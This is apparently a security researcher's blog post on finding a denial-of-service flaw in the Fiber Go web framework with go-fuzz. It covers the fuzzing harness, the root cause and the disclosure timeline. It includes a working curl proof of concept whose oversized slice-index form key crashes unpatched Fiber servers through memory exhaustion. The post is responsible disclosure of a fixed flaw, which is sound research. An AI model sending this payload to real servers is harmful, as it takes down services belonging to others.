9 minutes
Crashing Fiber via go-fuzz
For the past couple months (albeit very sporadically), I have been getting my feet wet in the world of fuzzing. I have been alluding to “fuzzing experiments” in my recent blogs - and I am happy to state that my experiments have yielded a result! I found an exploitable crash in the Fiber framework. When using Fiber’s Ctx.BodyParser
to parse form data containing a large numeric key that represents a slice index (e.g., test.18446744073704
), the application crashes due to an out-of-bounds slice allocation in the underlying schema decoder. This issue was discovered in Fiber v2.52.8 and has been fixed in v2.52.9. It has been assigned CVE-2025-54801
Background
I started experimenting with fuzzing earlier this year, around March - April. I first started with the “traditional” fuzzing route - fuzzing a binary using AFL++. Getting started was not too difficult. I found a lot of resources on how to set up AFL++ for macOS. At that time I was still using a Macbook with an Intel chip - so I don’t know if I would have encountered additional challenges on Apple Silicon - but on my Macbook, setting up AFL++ was fairly straigtforward. Infact, I just got it off brew. Understanding basic usage of AFL++ was also not too difficult. Along the way, I learnt a little bit about Make
and CMake
, and built many binaries.
What I realized though is:
- I did not understand how to develop fuzzing harnesses. I tried using ChatGPT to write them for me - but did not achieve much success. This was primarily because I was trying to get AI to do something I did not how to do - and therefore I could not explain to it what I wanted or what was going wrong.
- Even when I found a crash, I was not able to dive deeper into it due to my limited understanding of assembly or limted experience with using
llvm
orgdb
.
Due to these challenges, fuzzing binaries using AFL++ proved to be much more challenging than I had anticipated. This is a skill I definitely wish to pick up but for the time being it will have to wait.
Enter Go Fuzzing
Sometime later, while looking at something completely unrelated, I discovered that Go provides a fuzzing framework. They also provide a tutorial for it - which is fairly easy to follow. I experimented with this (i.e. did the tutorial) and found that it was much more intuitive to me than fuzzing binaries.
My next step was to find a target I could fuzz. My initial plan was to look at Go itself. I work with a lot of Go CVEs at my job - so naturally I wanted to find a CVE in Go. My thought process was:
- Look at existing CVEs in Go using the Go Vulnerability Database.
- Determine if any of these types were found by fuzzing (eg: file parsing issues, out of memory errors, etc).
- This required looking for a disclosure report of the CVE that had at least a proof-of-concept or some technical details about the vulnerability.
- Pick one or two of the standard packages where such CVEs exist.
- Fuzz
Step 2.1 proved to be more involved than I anticipated. I did not find technical information on the CVEs that explained how they were discovered or provided payloads that could trigger the issue. Again, if I looked long enough, I probably would have found a few technical reports for these CVEs, but I did not. I could look for interesting functionality in Go standard packages directly too - but Go has a lot of standard packages - and I don’t write Go code - so I did not know where to begin looking.
Instead, I looked into CVEs in open source projects. A lot of open source projects accept reports through Github - and many a times the advisory contains the complete original report. So my revised steps were:
- Look at CVEs in Go vulnerability database.
- Determine if any of these vulnerabilities had associated advisories on Github that contained the complete report.
- If they did, determine if a similar outcome can be achieved through fuzzing.
- If yes, fuzz the relevant components of the project.
Soon enough, I found this advisory for Fiber which described a crash in Ctx.BodyParser
. The setup was pretty simple:
- Create a server using Fiber.
- Send it malformed data.
- The server panics when provided certain crafted inputs which leads to a crash.
This is very fuzzable. I just need to create a server and then run a fuzzer to bombard the server with all kinds of weird input.
Fuzzing Fiber
From the README:
Fiber is an Express inspired web framework built on top of Fasthttp, the fastest HTTP engine for Go. Designed to ease things up for fast development with zero memory allocation and performance in mind.
It seems to be a pretty popular framework - as shown by the 1.8k forks and 37.3k stars.
I started the fuzzing experiment using Go’s provided fuzzing framework. Running it a couple times, I had one main complaint - it stopped every time the program crashed. I wanted to keep it running for a long time and collect all the crashes like AFL++ does. I tried using ChatGPT to wrestle with this design and eventually I gave up.
Next, I tried go-fuzz which is an open source Go fuzzing framework. The downside of this is that it is not maintained. My guess is that this was developed before Go supported fuzzing natively and then abandoned when Go added inbuilt support for fuzzing. Anyway, this worked much better for my exploration.
I created a simple server:
package main
import (
"fmt"
"net/http"
"github.com/gofiber/fiber/v2"
)
type RequestBody struct {
NestedContent []*struct{} `form:"test"`
}
func main() {
app := fiber.New()
app.Post("/", func(c *fiber.Ctx) error {
formData := RequestBody{}
if err := c.BodyParser(&formData); err != nil {
fmt.Println(err)
return c.SendStatus(http.StatusUnprocessableEntity)
}
return nil
})
fmt.Println(app.Listen(":3000"))
}
And a simple fuzzing harness
package fuzz
import (
"github.com/gofiber/fiber/v2"
"github.com/valyala/fasthttp"
)
type RequestBody struct {
NestedContent []*struct {
Value string `form:"value"`
} `form:"nested-content"`
}
var app *fiber.App
func init() {
app = fiber.New()
}
func fuzzParse(contentType string, data []byte) error {
fctx := &fasthttp.RequestCtx{}
c := app.AcquireCtx(fctx)
defer app.ReleaseCtx(c)
c.Request().Header.SetContentType(contentType)
c.Request().SetBody(data)
var parsed RequestBody
return c.BodyParser(&parsed)
}
func Fuzz(data []byte) int {
// Try JSON parsing
if err := fuzzParse("application/json", data); err == nil {
return 1
}
// Try form parsing
if err := fuzzParse("application/x-www-form-urlencoded", data); err == nil {
return 1
}
return 0
}
And let go-fuzz
do its thing.
Eventually, go-fuzz
found a few crashes. Some of them had the input format like NeſTED-content.18446744073704
. A similar crash was also discovered by Go’s inbuilt fuzzer previously. The key difference (and this may be a result of my harness) was that for the crash found by go-fuzz
the error was
runtime: out of memory: cannot allocate 147573956411392-byte block (3866624 in use)
fatal error: out of memory
while for Go’s inbuilt fuzzer, it just said killed
.
Reviewing the two crashes, I believe this was because of the go-fuzz
request also having Content-Type: application/x-www-form-urlencoded
. So in short, I could have saved a lot of time if I wrote my original harness for Go’s inbuilt fuzzer to include the content type. Oh well, you live and you learn.
Anyway, the curl for a request that causes the crash is
curl -v -X POST localhost:3000 --data-raw 'test.18446744073704' \
-H 'Content-Type: application/x-www-form-urlencoded'
Sending this payload to a server running Fiber v2.52.8 and below will crash the server due to an out of memory error.
Root Cause Analysis
The root cause of this issue lies within the decoder’s decode method:
idx := parts[0].index
if v.IsNil() || v.Len() < idx+1 {
value := reflect.MakeSlice(t, idx+1, idx+1) // <-- Panic/crash occurs here when idx is huge
if v.Len() < idx+1 {
reflect.Copy(value, v)
}
v.Set(value)
}
The idx
variable is not validated before use, leading to unsafe slice allocation for extremely large values. If the value is large enough, the process crashes due to an out of memory error.
CVSS v4 score
Base Score: 8.7 / High CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Fix
This issue has been fixed by this PR. It adds some checks to prevent large index values for parsers. This resolves the issue I reported.
Conclusion
I have this habit of not sticking to one thing. I like trying new things more than improving my skills in an “old” thing. This also holds true in my escapades with security research. I am trying to restrict myself to two areas:
- Running free SAST tools
- Go fuzzing
At the beginning of the year, my goal was to find 5 CVEs in 2025. I have since slightly altered the goal to find 5 vulnerabilities. Sometimes things don’t go your way and you don’t get a CVE assigned to your finding (see my last blog). So with this one, I am at 3. And would you look at that - I managed to publish 2 blogs in ~ 6 weeks!
I am attending BlackHat and Defcon again this year. My 2nd BlackHat and 3rd Defcon. This time I have given myself a few challenges to engage with the community. There are 16 in total. I hope to be able to complete them - and then write about them for my next post (primarily to cheat on increasing the count of articles on this blog without doing security research). Thanks for reading, as always.
Timeline
- May 29, 2025: Reported issue to Fiber maintainers through email.
- June 10, 2025: Sent a follow up email asking if my report was reviewed.
- June 12, 2025: Received a response from Fiber security acknowledging the issue.
- June 26, 2025: Requested a CVE once the issue is fixed.
- July 22, 2025: Sent a follow up email asking for an updated regarding fix and CVE assignment.
- July 29, 2025: Tested the issue in Fiber v2.52.9 and found it to be fixed. Sent another email requesting a CVE assignment since issue has been fixed.
- June 30, 2025: Reached out to a Fiber maintainer via Discord.
- June 30, 2025: Received a prompt response from maintainer on Discord. (Maybe I was barking up the wrong tree.)
- August 1, 2025: Drafted the GHSA as recommended by maintainer.
- August 5, 2025: GHSA published, blog published.
58a6fa7 @ 2025-08-05